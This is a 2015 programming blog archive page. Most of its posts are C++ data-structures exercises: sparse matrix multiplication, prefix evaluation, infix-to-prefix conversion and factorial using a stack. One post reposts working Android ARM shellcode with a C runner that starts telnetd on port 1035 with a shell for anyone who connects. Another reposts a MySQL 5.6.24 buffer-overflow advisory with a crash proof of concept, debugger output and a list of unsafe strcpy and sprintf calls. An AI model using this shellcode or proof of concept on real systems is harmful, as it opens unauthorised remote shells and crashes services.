October 2015

Friday 30 October 2015

Sparse Matrix Multiplication in CPP

AJITH KP October 30, 2015

Hi GuyZ,
This is a simple programming problem asked during your BCA/MCA/B.Tech Data Structures and Algorithms paper.

Source Code

#include <iostream>
#include <stdlib.h>
using namespace std;
/*
    Coded By Ajith Kp [ ajithkp560 ]
    (c) _TERMINAL_CODERS http://www.terminalcoders.blogspot.com (c)
*/
struct tripp
{
 int r, c, v;
};
class sparse
{
 int i, j, k, cc, cr, crb, sum, f[1024], pc[1024];
 public:
 tripp a[1024], b[1024];
 void read()
 {
  cout<<"Enter r, c & v: ";
  cin>>a[0].r>>a[0].c>>a[0].v;
  for(i=1;i<=a[0].v;i++)
  {
   cin>>a[i].r>>a[i].c>>a[i].v;
  }
 }
 void show()
 {
  k = 1;
  for(i=0;i<a[0].r;i++)
  {
   for(j=0;j<a[0].c;j++)
   {
    if(a[k].r==i && a[k].c==j)
    {
     cout<<a[k++].v<<"\t";
    }
    else cout<<"0\t";
   }
   cout<<"\n";
  }
 }
 void sort()
 {
     b[0] = a[0];
  for(i=0;i<a[0].c;i++)f[i] = 0;
  for(i=1;i<=a[0].v;i++)f[a[i].c]++;
  pc[0] = 1;
  for(i=1;i<a[0].c;i++)pc[i]=f[i-1]+pc[i-1];
  for(i=1;i<=a[0].v;i++)
  {
   b[pc[a[i].c]] = a[i];
   pc[a[i].c]++;
  }
 }
 sparse operator*(sparse sp)
 {
  if(a[0].c!=sp.b[0].r)
  {
   cout<<"Cannot perform operation\n";
   exit(0);
  }
  sparse s;
  k=1;
     i=1; 
     s.a[0].r = a[0].r;
     s.a[0].c = sp.b[0].c;
     while(i<=a[0].v) 
     {
         crb=i; 
         j=1; 
         while(j<=sp.b[0].v) 
         {
             cr=a[i].r; 
             cc=sp.b[j].c; 
             sum=0; 
 
    while(i<=a[0].v && j<=sp.b[0].v && cr==a[i].r && cc==sp.b[j].c) 
    { 
     if(a[i].c==sp.b[j].r) 
     { 
      sum+=a[i].v*sp.b[j].v; 
      i++;j++; 
     } 
     else if(a[i].c<sp.b[j].r) 
      i++; 
                 else 
                     j++; 
    } 
    if(sum) 
    {
     s.a[k].r=cr; 
     s.a[k].c=cc; 
     s.a[k].v=sum; 
     k++; 
    } 
    i=crb; 
    while(cc==sp.b[j].c) j++; 
   } 
   while(cr==a[i].r)
    i++; 
     } 

  s.a[0].v = k;
  return s;
 }
};
int main()
{
 sparse s1, s2, s3;
 s1.read();
 s2.read();
 cout<<"\nFirst matrix: \n";
 s1.show();
 cout<<"\nSecond Matrix: \n";
 s2.show();
 s2.sort();
 s3=s1*s2;
 cout<<"\n\nResult of multiplication:\n";
 s3.show();
}

Thursday 15 October 2015

Programming Languages Theory

Program for evaluation of Pre-fix Expression in CPP

AJITH KP October 15, 2015

Hi GuyZ,
This is another question which you may want to solve in you graduation level/post-graduation level `Data structures and Algorithms`. The solution is given bellow.

Source Code

/*
    [][][]
    [][][]
    [][][]
    [][][]  TerminalCoders.Blogspot.Com
    [][][]
    [][][]
    [][][]
*/
#include <iostream>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
using namespace std;
struct symtable
{
    char var;
    int val;
};
class stack
{
    int arr[1024];
    int ptr, i;
public:
    stack()
    {
        ptr = 0;
    }
    int isEmpty()
    {
        if(ptr==0)return 1;
        return 0;
    }
    int top()
    {
        return arr[ptr-1];
    }
    void push(int c)
    {
        arr[ptr++] = c;
    }
    int pop()
    {
        return arr[--ptr];
    }
    void disp()
    {
        for(i=0;i<ptr;i++)cout<<arr[i]<<" ";
        cout<<endl;
    }
};
class prefix
{
    int i, symLen, op1, op2;
    long int res;
    char pre[1024];
    symtable sym[1024];
    stack stk;
public:
    prefix()
    {
        symLen = 0;
    }
    void reverse(char *str, int l)
    {
        for(i=0;i<l/2;i++)
        {
            char tmp = str[i];
            str[i] = str[l-i-1];
            str[l-i-1] = tmp;
        }
    }
    int isInSymtab(char ch, int len)
    {
        for(i=0;i<len;i++)
        {
            if(sym[i].var==ch)return 1;
        }
        return 0;
    }
    int getVal(char ch, int len)
    {
        for(i=0;i<len;i++)
        {
            if(sym[i].var==ch)return sym[i].val;
        }
    }
    int isOperator(char ch)
    {
        if(ch=='+' || ch=='-' || ch=='/' || ch=='*' || ch=='^')return 1;
        return 0;
    }
    void read()
    {
        cout<<"Enter expression: ";
        cin.getline(pre, 1024);
        reverse(pre, strlen(pre));
    }
    void eval()
    {
        int sum, p;
        char str[2], *ptr = pre;
        while(*ptr!='\0')
        {
            if(isupper(*ptr))
            {
                if(isInSymtab(*ptr, symLen))
                {
                    stk.push(getVal(*ptr, symLen));
                }
                else
                {
                    cout<<"Enter value for "<<*ptr<<": ";
                    cin>>i;
                    stk.push(i);
                    //cout<<stk.top()<<endl;
                    sym[symLen].var = *ptr;
                    sym[symLen].val=i;
                    symLen++;
                }
            }
            else if(isdigit(*ptr))
            {
                sprintf(str, "%c", *ptr);
                sum = atoi(str);
                p = 10;
                *ptr++;
                while(isdigit(*ptr))
                {
                    sprintf(str, "%c", *ptr);
                    sum+=(atoi(str)*p);
                    p*=10;
                    *ptr++;
                }
                *ptr--;
                stk.push(sum);
            }
            else if(isOperator(*ptr))
            {
                op1 = stk.pop();
                op2 = stk.pop();
                switch(*ptr)
                {
                    case '+':
                        res = op1+op2;
                        break;
                    case '-':
                        res = op1-op2;
                        break;
                    case '/':
                        res = op1/op2;
                        break;
                    case '*':
                        res = op1*op2;
                        break;
                    case '^':
                        res = pow(op1, op2);
                        break;
                }
                stk.push(res);
            }
            *ptr++;
        }
        int ans = stk.pop();
        cout<<"Result: "<<ans<<endl;
    }
};
int main()
{
    prefix pre;
    pre.read();
    pre.eval();
    return 0;
}

Friday 9 October 2015

Shellcode

Android Shellcode Telnetd with Parameters

AJITH KP October 09, 2015

Hi GuyZ,
Android Telnetd Shellcode with Parameter.

Shell Code

/* 
Title:  Android/ARM - telnetd with three parameters and an environment variable
Date: 2015-07-31
Tested on: Android Emulator and Samsung Note 10.1 (Android version 4.1.2)
Author: Steven Padilla - email: spadilla@tresys.com
Organization: Tresys LLC
Vendor HomePage: www.tresys.com
Version: 1.0
  
  
Android ARM shellcode with dynamic string creation and including no
0x20, 0x0a and 0x00.
  
This shellcode will execute telnetd listening on port 1035.  Whenever
anyone connects to port 1035 they will be presented with a shell
prompt.  This code assumes that telnetd and sh are executables in the
/system/bin/ directory.
  
In order to minimize the length of the shellcode the beginning of the
path /system/bin/ is created once and stored three times.
  
The executable name (/system/bin/telnetd), the other two paramaters
(-p1035 and -l/system/bin/sh) and the environment variable
(PATH=/system/bin) are strings that are created and stored in memory
above the top of the stack. The strings are created by first moving a
byte to register1, left shitf register1 8 bits, add the next byte,
left shift again, add the next byte, left shift again and then adding
the fourth byte.  Note that due to endianess the bytes are added in
reverse order.  Thus if the string to be created is "/adb" the 'b'
would be moved into r1, followed by the shift and then the 'd' is
added, shift, then the 'a', shift, and finally the '/'.
  
In the example below the stack pointer has the value 0xbe91da08.
  
Right before calling the execve call (i.e., svc 1 with register 7 containing
11) register0 is loaded with the 0xbe91da24, register1 is loaded with
the 0xbe91da0c and register2 is loaded with 0xbe91da1c.  The memory
above the stack should look like the following (note to make it easier
to read the strings are presented in the order they appear if you read
them as strings.  If you look at each word you will see the bytes in
reverse order due to endianess) :
  
               +----------------------------------+
0xbe91da08     | NULL                             |  This is where the stack 
               |                                  |  pointer is pointing.
               +----------------------------------+
0xbe91da0c     | 0xbe91da24                       |  These first three entries 
               |                                  |  are pointers to the path 
               |                                  |  of the executable and its 
               |                                  |  two parameters.
               +----------------------------------+
0xbe91da10     | 0xbe91da50                       |
               +----------------------------------+
0xbe91da14     | 0xbe91da5f                       |
               +----------------------------------+
0xbe91da18     | NULL                             | The list of parameters must
               |                                  |  be terminated by a NULL.
               +----------------------------------+
0xbe91da1c     | 0xbe91da88                       | This points to the first 
               |                                  | (and only) environment 
               |                                  | variable.
               +----------------------------------+
0xbe91da20     | NULL                             | The list of environment 
               |                                  | variables must be terminated
               |                                  | by a NULL.
               +----------------------------------+
0xbe91da24     | "//system/bin/telnetd"           | This is where the name of 
               |                                  | the executable and the first
               |                                  | parameter is stored.
               +----------------------------------+
0xbe91da50     | "-p1035"                         | This is where the second 
               |                                  | parameter is stored.
               +----------------------------------+
0xbe91da5f     | "-l/system/bin/sh"               | This is where the third 
               |                                  | parameter is stored.
               +----------------------------------+
0xbe91da88     | "PATH=/system/bin/"              | This is where the first 
               |                                  | environment variable is 
               |                                  | stored.
               +----------------------------------+
  
*/
  
#include <stdio.h>
#include <string.h>
  
char *SC =  "\x01\x30\x8f\xe2" //add r3,pc, #1
        "\x13\xff\x2f\xe1" //bx r3
        "\x78\x46"     //mov r0, pc
        "\x18\x30"     //adds r0, 0x18
        "\x92\x1a"     // subs r2,r2,r2
        "\x49\x1a"         // subs r1, r1, r1
  
        "\x6a\x44"     // add r2, sp
  
        "\x79\x21"     // mov r1, 'y'
        "\x09\x02"     // LSL r1,r1, #8
        "\x73\x31"     // adds r1, 's'
        "\x09\x02"     // LSL r1,r1, #8
        "\x2f\x31"     // adds r1, '/'
        "\x09\x02"     // LSL r1,r1, #8
        "\x2f\x31"     // adds r1, '/'
        "\x07\x91"     // str r1, [sp, #4]
  
        "\x12\x25"     // mov r5, 0x12
        "\x4d\x40"     // eor r5,r1
        "\x21\x95"     // str r5, [sp, #4]
  
        "\x43\x25"     // mov r5, 0x43
        "\x4d\x40"     // eor r5,r1
        "\x16\x95"     // str r5, [sp, #4]
  
        "\x6d\x21"     // mov r1, 'm'
        "\x09\x02"     // LSL r1,r1, #8
        "\x65\x31"     // adds r1, 'e'
        "\x09\x02"     // LSL r1,r1, #8
        "\x74\x31"     // adds r1, 't'
        "\x09\x02"     // LSL r1,r1, #8
        "\x73\x31"     // adds r1, 's'
        "\x08\x91"     // str r1, [sp, 0x8]
        "\x17\x91"     // str r1, [sp, 0x17]
        "\x22\x91"     // str r1, [sp, 0x22]
  
        "\x6e\x21"     // mov r1, 'n'
        "\x09\x02"     // LSL r1,r1, #8
        "\x69\x31"     // adds r1, 'i'
        "\x09\x02"     // LSL r1,r1, #8
        "\x62\x31"     // adds r1, 'b'
        "\x09\x02"     // LSL r1,r1, #8
        "\x2f\x31"     // adds r1, '/'
        "\x09\x91"     // str r1, [sp, 0x9]
        "\x18\x91"     // str r1, [sp, 0x18]
        "\x23\x91"     // str r1, [sp, 0x23]
  
        "\x6c\x21"     // mov r1, 'l'
        "\x09\x02"     // LSL r1,r1, #8
        "\x65\x31"     // adds r1, 'e'
        "\x09\x02"     // LSL r1,r1, #8
        "\x74\x31"     // adds r1, 't'
        "\x09\x02"     // LSL r1,r1, #8
        "\x2f\x31"     // adds r1, '/'
                "\x28\x24"         // mov r4, 0x0f
                "\x11\x51"         // str r1, [r2, r4] 
  
        "\x6c\x25"     // mov r5, 'l'
        "\x2d\x02"     // LSL r1,r1, #8
        "\x0d\x35"     // adds r5, 0x0d
        "\x2d\x02"     // LSL r1,r1, #8
        "\x07\x35"     // adds r5, 0x07
        "\x2d\x02"     // LSL r1,r1, #8
        "\x4d\x40"     // eor r5,r1
        "\x19\x95"     // str r5, [sp, 0x19]
  
        "\x64\x21"     // mov r1, 'd'
        "\x09\x02"     // LSL r1,r1, #8
        "\x74\x31"     // adds r1, 't'
        "\x09\x02"     // LSL r1,r1, #8
        "\x65\x31"     // adds r1, 'e'
        "\x09\x02"     // LSL r1,r1, #8
        "\x6e\x31"     // adds r1, 'n'
        "\x0b\x91"     // str r1, [sp, 0xb]
  
        "\x49\x1a"         // subs r1, r1, r1
        "\x0c\x91"     // str r1, [sp, 0xc]
  
        "\x30\x21"     // mov r1, '0'
        "\x09\x02"     // LSL r1,r1, #8
        "\x31\x31"     // adds r1, '1'
        "\x09\x02"     // LSL r1,r1, #8
        "\x70\x31"     // adds r1, 'p'
        "\x09\x02"     // LSL r1,r1, #8
        "\x2d\x31"     // adds r1, '-'
        "\x12\x91"     // str r1, [sp, #44]
  
        "\x49\x1a"         // subs r1, r1, r1
        "\x35\x31"     // add r1, '5'
        "\x09\x02"     // LSL r1,r1, #8
        "\x33\x31"     // adds r1, '3'
        "\x13\x91"     // str r1, [sp, 0x13]
  
        "\x49\x1a"         // subs r1, r1, r1
        "\x14\x91"     // str r1, [sp, 0x14]
  
        "\x2d\x21"     // mov r1, '-'
        "\x09\x02"     // LSL r1,r1, #8
        "\x09\x02"     // LSL r1,r1, #8
        "\x09\x02"     // LSL r1,r1, #8
        "\x15\x91"     // str r1, [sp, 0x15]
  
        "\x49\x1a"         // subs r1, r1, r1
        "\x1f\x91"     // str r1, [sp, 0x1f]
  
        "\x48\x21"     // mov r1, 'H'
        "\x09\x02"     // LSL r1,r1, #8
        "\x54\x31"     // adds r1, 'T'
        "\x09\x02"     // LSL r1,r1, #8
        "\x41\x31"     // adds r1, 'A'
        "\x09\x02"     // LSL r1,r1, #8
        "\x50\x31"     // adds r1, 'P'
        "\x80\x24"         // mov r4, 0x0f
                "\x11\x51"         // str r1, [r2, r4] 
  
        "\x2f\x21"     // mov r1, '/'
        "\x24\x91"     // str r1, [sp, 0x24]
  
        "\x04\x32"     // add r2, 0x4
  
        "\x49\x1a"         // subs r1, r1, r1
        "\x11\x1c"     // add r1, r2, #0 
        "\x18\x31"     // add r1, 0x18
        "\x01\x91"     // str r1, [sp, 0x1]
  
        "\x2c\x31"     // add r1, #40
        "\x02\x91"     // str r1, [sp, 0x2]
  
        "\x0f\x31"     // add r1, #4
        "\x03\x91"     // str r1, [sp, 0x3]
  
        "\x29\x31"     // add r1, #28
        "\x05\x91"     // str r1, [sp, #0x5]
  
        "\x49\x1a"         // subs r1, r1, r1
        "\x04\x91"         // str r1, [sp, 0x4]
  
        "\x06\x91"         // str r1, [sp, 0x6]
  
        "\x10\x1c"     // add r0, r2, #0 
        "\x18\x30"     // add r0, 0x18
  
        "\x11\x1c"     // add r1, r2, #0 
          
        "\x10\x32"     // adds r2, 0x10
  
        "\xdb\x1a"         // subs r3, r3, r3
          
  
        "\x0b\x27"     //movs r7,#11
        "\x01\xdf";    //svc 1
  
int main(void)
{
    (*(void(*) ()) SC) ();
    return 0;
}

Thursday 8 October 2015

Programming Languages Theory

Infix to Prefix using Stack in C++

AJITH KP October 08, 2015

Hi GuyZ,
This is just another sample program question which you have to solve in "Data Structures and Algorithms" paper.

Steps

1. Reverse the infix expression.
2. Convert '(' to ')' and ')' to '('.
3. Do a postfix conversion
4. Reverse the postfix expression to get infix expression.

Source Code

/*
    [][][]
    [][][]
    [][][]
    [][][]  TerminalCoders.Blogspot.Com
    [][][]
    [][][]
    [][][]
*/
 
#include <iostream>
#include <string.h>
#include <stdio.h>
using namespace std;
class stack
{
 char arr[1024];
 int ptr;
 public:
 stack()
 {
  ptr = 0;
 }
 int isEmpty()
 {
  if(ptr==0)return 1;
  return 0;
 }
 char top()
 {
  return arr[ptr-1];
 }
 void push(char c)
 {
  arr[ptr++] = c;
 }
 char pop()
 {
  return arr[--ptr];
 }
};
int isOperator(char character)
{
    if (character == '+' || character == '-' || character == '*' || character == '/' || character=='^') {
        return 1;
    }    
    return 0;
}
int isOperand(char character)
{    
    if (isOperator(character) == 0 && character != '(' && character != ')') {
        return 1;
    }
    return 0;
}

int isp(char op) {
 switch(op)
 {
  case '+':
  case '-':
   return 1;
   break;
  case '*':
  case '/':
   return 3;
   break;
  case '^':
   return 6;
   break;
  return 0;
  break;
 }
}

int icp(char op) {
 switch(op)
 {
  case '+':
  case '-':
   return 2;
   break;
  case '*':
  case '/':
   return 4;
   break;
  case '^':
   return 5;
   break;
  return 0;
  break;
 }
}
void reverse(char* str, int len) 
{
 for(int i=0; i<len/2; i++) 
 {
  char temp=str[i];
  str[i]=str[len-i-1];
  str[len-i-1]=temp;
 }
}
int main()
{
 char inf[1024], pre[1024], tmp[1024], *ptr;
 stack s;
 cout<<"Infix: ";
 cin>>inf;
 reverse(inf, strlen(inf));
 strcpy(tmp, "");
 strcpy(pre, "");
 ptr = inf;
 while(*ptr!='\0')
 {
  if(isOperand(*ptr))
  {
   sprintf(tmp, "%c", *ptr);
   strcat(pre, tmp);
  }
  else if(isOperator(*ptr))
  {
   while(!s.isEmpty() && s.top()!=')' && isp(s.top())>icp(*ptr))
   {
    sprintf(tmp, "%c", s.pop());
    strcat(pre, tmp);
   }
   s.push(*ptr);
  }
  else if(*ptr==')')
  {
   s.push(*ptr);
  }
  else if(*ptr=='(')
  {
   while(!s.isEmpty())
   {
    if(s.top()==')')
    {
     s.pop();
     break;
    }
    if(s.top()=='(')
    {
     continue;
    }
    sprintf(tmp, "%c", s.pop());
    strcat(pre, tmp);
   }
  }
  *ptr++;
 }
 while(!s.isEmpty())
 {
  sprintf(tmp, "%c", s.top());
  strcat(pre, tmp);
  s.pop();
 }
 reverse(pre, strlen(pre));
 cout<<pre<<endl;
}

Vulnerability

MySQL 5.6.24 Buffer Overflow Vulnerability

AJITH KP October 08, 2015

Hi GuyZ,

Hackers have detected new BOF vulnerability in MySQL 5.6.24. The remote exploit has been released.

POC

a888b.
             d888888b.
             8P"YP"Y88
             8|o||o|88
             8' -  .88
             8`._.' Y8.
            d/      `8b.
           dP   .    Y8b.
          d8:'  "  `::88b
         d8"         'Y88b
        :8P    '      :888
         8a.   :     _a88P
       ._/"Yaa_:   .| 88P|
       \    YP"    `| 8P  `.
       /     \.___.d|    .'
       `--..__)888P`._.'
 
 
                           ~ Keeping Things Simple!
 
 
 
MySQL v5.6.24 BUFFER OVERFLOWS
 
 
Date: 07/10/2015
 
Author: Nicholas Lemonias
 
============================================================
 
 
========================
SUMMARY
=========================
 
During a manual source code audit of MYSQL Version 5.6.24, various
buffer overflow issues have been realized.
 
 
 
===================
TECHNICAL DETAILS
===================
 
 
root@priv8: ~# /usr/bin/mysql_plugin ‘perl -e ‘print “X” x 9000"
 
*** buffer overflow detected ***: mysql_plugin terminated
======= Backtrace: =========
/lib/i386-linux-gnu/i686/cmov/libc.so.6(+0x6c6f3)[0xb720d6f3]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__fortify_fail+0x45)[0xb729b2d5]
/lib/1386-linux-gnu/1686/cmov/libc.so.6(+0xf838a)[0xb729938a]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
   insecure call
mysql_plugin(main+0x202)[0xb752ee22]
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__libc_start_main+0xf3)[0xb71baa63]
mysql_plugin(+0xa90d)[0xb752f90d]
======= Memory map: ========
b6800000-b6821000 nw-p 00000000 00:00
b6821000-b6900000 ---p 00000000 00 00
b699d000-b699e000 ---p 00000000 00:00
b699e000-b71a1000 rw-p 00000000 00 00
b71a1000-b7345000 r-xp 00000000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.50
 
b7345000-b7347000 r-—p 001a4000 00:13 1673
/lib/i386-linux~gnu/i686/cmov/libc-2.1
9.so
 
b7347000-b7348000 rw-p 00la6000 00:13 1673
/lib/i386-linux-gnu/i686/cmov/libc-2.1
9.so
 
b7348000-b734b000 rw-p 00000000 00 00 0
 
b734b000-b7367000 r-xp 00000000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7367000-b7368000 rw-p 0001b000 00:13 15697 /lib/i386-linux-gnu/1ibgcc_s.so.1
b7368000—b73ac000 r-xp 00000000 00:13 15649
/lib/i386-linux-gnu/1686/cmov/libm-2.1
9.so
bffc9000-c0000000 pw-p 00000000 00:00 0 [stack]
 
Program received signal SIGABRT, Aborted.
Oxb7fdebe0 in __kernel_vsyscall ()
(gdb) bt
#0 0xb7fdebe0 in __kernel_vsyscall ()
#1 0xb7caa307 in __GI_raise (sig=sig@entry=6)
at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#2 0xb7cab9c3 in __GI_abort () at abort.c:89
#3 0xb7ce86f8 in __libc_message (do_abort=do_abort@entry=2,
fmt=fmt@entry=0xb7ddbe55 "*** %s ***: %s terminated\n”)
at ../sysdeps/posix/libc_fatal.c:175
#4 0xb7d762d5 in __GI___fortify_fail (
msg=msg@entry=0xb7ddbdd6 "buffer overflow detected”)
at fortify_fail.c:31
#5 0xb7d7438a in __GI___chk_fail () at chk_fail.c:28
#6 0xb7d73877 in __strcpy_chk (dest=0xbffe8c9c 'A' <repeats 200 times>...,
src=0xbffe96ed 'A' <repeats 200 times>..., destlen=<optimized out>)
at strcpy_chk.c:60
#7 0x80009e22 in main ()
 
(gdb)
 
 
 
(gdb) disas
Dump of assembler code for function __kernel_vsyscall:
 
0xb7fdebd0 <+0>: push %ecx
0xb7fdebd1 <+1>: push %edx
Oxb7fdebd2 <+2>: push %ebp
Oxb7fdebd3 <+3>: mov %esp,%ebp
0xb7fdebd5 <+5>: sysenter
Oxb7fdebd7 <+7>: nop
 
Oxb7fdebd8 <+8>: nop
 
0xb7fdebd9 <+9>: nop
 
Oxb7fdebda <+10>: nop
Oxb7fdebdb <+11>: nop
Oxb7fdebdc <+12>: nop
Oxb7fdebdd <+13>: nop
Oxb7fdebde <+14>: int x80
=> Oxb7fdebe0 <+16>: pop %ebp
Oxb7fdebe1 <+17>: pop %edx
0xb7fdebe2 <+18>: pop %ecx
Oxb7fdebe3 <+19>: ret
End of assembler dump.
 
(gdb)
 
 
============================
TECHNICAL SYNOPSIS / POC #2
============================
 
Unsafe Use of strcpy; this can lead to a buffer overflow condition
 
 
----->
/lib/i386-linux-gnu/1686/cmov/libc.so.6(__strcpy_chk+0x37)[0xb7298877]
 
A user-supplied string from the command-line is copied to a fixed
length destination buffer.
 
 
-----------------[ mysql_plugin.c]-------------------------------
 
Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);
 
 
permission set:
 
-rwxr-xr-x 1 root root 2833756 Jul 15 21:22 /usr/bin/mysql_plugin
 
===============================================
MySQL V 5.6.24  VULNERABILITIES - SOURCE CODE
===============================================
 
 
1. Insecure use of sprintf
 
 
Vulnerability Description: A char*  type is copied to a fixed length
destination  buffer. This could lead to a buffer overflow.
 
Line: 577 - Filename: ../mysql/mysql-5.6.24/regex/main.c
 
sprintf(efbuf, "MY_REG_%s", name);
 
2.
 Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.
 
Line: 796 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(plugin_name, argv[i]);
 
3.
 Unsafe Use of strcpy  could  lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is copied to a fixed length destination buffer. This
could lead to a buffer overflow.
 
Line: 797 - Filename: ../mysql/mysql-5.6.24/client/mysql_plugin.c
strcpy(config_file, argv[i]);
 
4.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 544 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched null at `%.20s'", p);
 
5.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 525 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s'", len, p);
 
6.
 Unsafe Use of strcpy  could  lead to an overflow condition.
Vulnerability Description: A user-supplied string from the
command-line is being copied to a fixed length destination buffer.
This could lead to a buffer overflow.
Line: 413 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/dblqh/redoLogReader/reader.cpp
strcpy(fileName, argv[1]);
 
7.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination buffer. This could lead to a buffer overflow.
Line: 531 - Filename: ../mysql/mysql-5.6.24/regex/main.c
sprintf(grump, "matched `%.*s' instead", len, p);
 
8.
Insecure use of sprintf.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 710 - Filename: ../mysql/mysql-5.6.24/client/mysqlshow.c
sprintf(query,"select count(*) from `%s`", table);
 
 
9.
Insecure use of sprintf
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 121 - Filename: ../mysql/mysql-5.6.24/libmysql/conf_to_src.c
sprintf(buf, "%s.conf", set);
 
 
10.
 Unsafe Use of strcpy could  lead to an overflow condition.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This could lead to a buffer overflow.
Line: 784 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/PosixAsyncFile.cpp
strcpy(path, src);
 
 
11.
 Unsafe Use of strcpy could lead to an overflow condition.
Vulnerability Description: A char*  type is being copied  to a fixed
length destination  buffer. This, could lead to an overflow.
Line: 377 - Filename:
../mysql/mysql-5.6.24/storage/ndb/src/kernel/blocks/ndbfs/Win32AsyncFile.cpp
strcpy(path, src);
<<<
Size of PATH is PATH_MAX 256

Wednesday 7 October 2015

Programming Languages Theory

Factorial using stack in C++

AJITH KP October 07, 2015

Hi GuyZzZ...

I would like to share the code which you can implement factorial using stack. It is a question from Data Structures and Algorithm.

Source Code

#include <iostream>
using namespace std;
/*
 * Coded By Ajith Kp [ajithkp560]
 *  http://www.terminalcoders.blogspot.com
 *  
*/
class stack
{
 int arr[1024], ptr;
 public:
 stack()
 {
  ptr = 0;
 }
 void push(int n)
 {
  arr[ptr++]=n;
 }
 int pop()
 {
  return arr[--ptr];
 }
};
int main()
{
 int n, i;
 stack s;
 cout<<"Limit: ";
 cin>>n;
 for(i=n;i>0;i--)
 {
  s.push(i);
 }
 int fact = 1;
 while(n--)fact*=s.pop();
 cout<<"Factorial: "<<fact<<endl;
 return 0;
}